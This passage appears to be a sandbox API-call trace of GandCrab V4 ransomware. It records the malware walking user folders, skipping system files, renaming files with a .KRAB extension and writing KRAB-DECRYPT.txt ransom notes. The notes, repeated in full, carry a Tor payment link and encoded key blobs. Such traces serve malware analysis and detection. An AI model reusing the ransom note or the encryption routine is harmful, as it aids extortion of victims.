iQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.318] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.319] CloseHandle (hObject=0x320) returned 1 [0100.319] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.319] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.320] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x201)) [0100.320] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.320] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.320] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.320] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Cookies\\d2ca4a08d2ca4dee3d.lock") returned 48 [0100.320] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\cookies\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.321] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.321] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.321] lstrlenW (lpString="C:\\Users\\Default\\Cookies\\") returned 25 [0100.321] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Cookies\\*") returned="C:\\Users\\Default\\Cookies\\*" [0100.321] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.322] CloseHandle (hObject=0x320) returned 1 [0100.322] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.322] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.322] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.322] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\d2ca4a08d2ca4dee3d.lock" [0100.322] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.322] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 45 [0100.322] lstrlenW (lpString="C:\\Users\\Default\\d2ca4a08d2ca4dee3d.lock") returned 40 [0100.322] lstrlenW (lpString=".lock") returned 5 [0100.322] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.322] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.323] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.323] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.323] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.323] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0100.323] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0100.323] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0100.323] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0100.323] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.323] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.323] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.323] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.324] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.324] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.324] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.324] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Desktop\\\\KRAB-DECRYPT.txt") returned 42 [0100.324] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\desktop\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.325] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.325] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.326] CloseHandle (hObject=0x320) returned 1 [0100.326] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.326] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.326] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x210)) [0100.326] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.326] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.327] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.327] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned 48 [0100.327] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\desktop\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.327] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.328] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.328] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\") returned 25 [0100.328] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Desktop\\*") returned="C:\\Users\\Default\\Desktop\\*" [0100.328] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdfe0 [0100.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.328] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.328] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.328] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.328] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.328] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Desktop\\d2ca4a08d2ca4dee3d.lock" [0100.328] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.329] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Desktop\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 53 [0100.329] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned 48 [0100.329] lstrlenW (lpString=".lock") returned 5 [0100.329] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.329] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.329] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.329] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.329] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.329] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.329] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.329] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Desktop\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Desktop\\KRAB-DECRYPT.txt" [0100.330] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.330] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Desktop\\KRAB-DECRYPT.txt.KRAB") returned 46 [0100.330] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\KRAB-DECRYPT.txt") returned 41 [0100.330] lstrlenW (lpString=".txt") returned 4 [0100.330] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.330] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.330] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.330] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\KRAB-DECRYPT.txt") returned 41 [0100.330] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\KRAB-DECRYPT.txt") returned 41 [0100.330] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.331] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.333] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.334] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.334] FindClose (in: hFindFile=0xfbdfe0 | out: hFindFile=0xfbdfe0) returned 1 [0100.334] CloseHandle (hObject=0x320) returned 1 [0100.334] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.334] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0100.334] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0100.334] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0100.334] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0100.334] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.334] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.334] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.334] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.334] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.334] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.335] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.335] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Documents\\\\KRAB-DECRYPT.txt") returned 44 [0100.335] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\documents\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.407] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQ